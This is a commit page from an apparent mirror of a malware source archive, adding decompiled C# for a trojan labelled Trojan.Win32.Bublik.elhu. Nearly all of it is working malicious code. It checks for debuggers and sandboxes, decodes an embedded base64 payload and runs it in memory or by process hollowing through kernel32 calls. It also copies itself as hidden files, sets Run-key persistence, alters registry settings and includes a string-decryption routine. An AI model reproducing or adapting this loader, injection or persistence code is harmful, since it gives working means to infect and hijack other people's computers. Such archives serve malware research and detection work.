daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/AssemblyInfo.cs
+5
View File
@@ -0,0 +1,5 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/Trojan.Win32.Bublik.elhu.csproj
+48
View File
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BC59CD54-9FCB-4971-9624-E42E6033A01C}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>server2</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="  " />
<EmbeddedResource Include="file" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/Trojan.Win32.Bublik.elhu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "server2", "Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.csproj", "{BC59CD54-9FCB-4971-9624-E42E6033A01C}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0002.cs
+457
View File
@@ -0,0 +1,457 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(-626735724);
private static string \u0005 = \u0008.\u0002(-626735724);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = true;
private static bool \u000F = true;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = true;
private static bool \u0005\u2000 = true;
private static bool \u0008\u2000 = true;
private static bool \u0006\u2000 = true;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = true;
private static bool \u0002\u2001 = true;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = true;
private static bool \u0008\u2001 = true;
private static bool \u0006\u2001 = true;
private static bool \u000E\u2001 = true;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(-626735683);
private static string \u0003\u2002 = \u0008.\u0002(-626735663);
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(-626735669);
private static bool \u0005\u2003 = true;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(-626735471));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735482)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-626735436);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-626735431))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735446)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735400)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735410)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735363)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735386)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735595)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-626735589));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735604), true).SetValue(\u0008.\u0002(-626735538), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735138));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138), true).SetValue(\u0008.\u0002(-626735127), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138), true).SetValue(\u0008.\u0002(-626735127), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-626735360),
Arguments = \u0008.\u0002(-626735308),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735291), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735291), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735258), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735258), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735604), true).SetValue(\u0008.\u0002(-626735971), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735939), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-626735939), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735897));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000))))
return;
string str = \u0008.\u0002(-626736083) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-626736034) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-626736055);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626736006));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626736006)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0003.cs
+310
View File
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System;
using System.Runtime.InteropServices;
internal sealed class \u0003
{
private void \u0002() => Console.Write(\u0008.\u0002(-626735471));
[DllImport("kernel32")]
private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);
[DllImport("kernel32")]
private static extern IntPtr LoadLibrary(string _param0);
public void \u0002(byte[] _param1, string _param2, string _param3)
{
\u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
\u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
this.\u0002();
\u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
\u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
this.\u0002();
\u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
\u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
this.\u0002();
structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
obj4.\u0002 = 65543U;
this.\u0002();
GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
this.\u0002();
gcHandle.Free();
\u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
this.\u0002();
\u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
this.\u0002();
if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
return;
\u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735843)), typeof (\u0003.\u0002));
\u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735864)), \u0008.\u0002(-626735816)), typeof (\u0003.\u0005));
\u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735779)), typeof (\u0003.\u0008));
this.\u0002();
\u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735800)), typeof (\u0003.\u0003));
\u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735773)), typeof (\u0003.\u0006));
\u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736488)), typeof (\u0003.\u000E));
this.\u0002();
\u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736463)), typeof (\u0003.\u000F));
this.\u0002();
int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
this.\u0002();
if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
return;
int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
this.\u0002();
for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
{
structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
byte[] numArray = new byte[(IntPtr) structure1.\u0008];
for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
this.\u0002();
int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
}
int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
this.\u0002();
byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
this.\u0002();
int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
int num8 = (int) forFunctionPointer7(obj3.\u0003);
}
private delegate bool \u0002(
string _param1,
string _param2,
IntPtr _param3,
IntPtr _param4,
bool _param5,
\u0003.\u0002\u2000 _param6,
IntPtr _param7,
string _param8,
ref \u0003.\u0006\u2000 _param9,
out \u0003.\u000E\u2000 _param10);
private delegate bool \u0003(
IntPtr _param1,
IntPtr _param2,
byte[] _param3,
uint _param4,
object _param5);
private delegate bool \u0005(IntPtr _param1, IntPtr _param2);
private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);
private delegate bool \u0008(
IntPtr _param1,
IntPtr _param2,
uint _param3,
\u0003.\u0008\u2000 _param4,
\u0003.\u0005\u2000 _param5);
private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);
private delegate uint \u000F(IntPtr _param1);
private enum \u0002\u2000 : uint
{
}
private struct \u0002\u2002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public uint \u0005\u2000;
}
private enum \u0003\u2000 : uint
{
}
private enum \u0005\u2000 : uint
{
}
private struct \u0006\u2000
{
public uint \u0002;
public string \u0003;
public string \u0005;
public string \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public short \u000E\u2000;
public short \u000F\u2000;
public IntPtr \u0002\u2001;
public IntPtr \u0003\u2001;
public IntPtr \u0005\u2001;
public IntPtr \u0008\u2001;
}
private enum \u0008\u2000 : uint
{
}
private struct \u000E\u2000
{
public IntPtr \u0002;
public IntPtr \u0003;
public uint \u0005;
public uint \u0008;
}
private struct \u000F\u2000
{
public int \u0002;
public IntPtr \u0003;
public bool \u0005;
}
private struct \u0002\u2001
{
public ushort \u0002;
public ushort \u0003;
public ushort \u0005;
public ushort \u0008;
public ushort \u0006;
public ushort \u000E;
public ushort \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public ushort \u0005\u2000;
public ushort \u0008\u2000;
public ushort \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0008\u2001;
public int \u0006\u2001;
}
private struct \u0003\u2001
{
public ushort \u0002;
public ushort \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public ushort \u000E;
public ushort \u000F;
}
private struct \u0005\u2001
{
public uint \u0002;
public uint \u0003;
}
private struct \u0006\u2001
{
public uint \u0002;
public \u0003.\u0003\u2001 \u0003;
public \u0003.\u0008\u2001 \u0005;
}
private struct \u0008\u2001
{
public ushort \u0002;
public byte \u0003;
public byte \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
public ushort \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
public ushort \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public ushort \u0003\u2002;
public ushort \u0005\u2002;
public uint \u0008\u2002;
public uint \u0006\u2002;
public uint \u000E\u2002;
public uint \u000F\u2002;
public uint \u0002\u2003;
public uint \u0003\u2003;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0005\u2001[] \u0005\u2003;
}
private struct \u000E\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0002\u2000;
public uint \u0003\u2000;
}
private struct \u000F\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public \u0003.\u000E\u2001 \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public uint \u000E\u2000;
public uint \u000F\u2000;
public uint \u0002\u2001;
public uint \u0003\u2001;
public uint \u0005\u2001;
public uint \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public uint \u0003\u2002;
public uint \u0005\u2002;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0008\u2002;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0005.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System.Runtime.InteropServices;
internal sealed class \u0005
{
internal static \u0005.\u0002 \u0002;
[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
private struct \u0002
{
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0006.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0008.cs
+101
View File
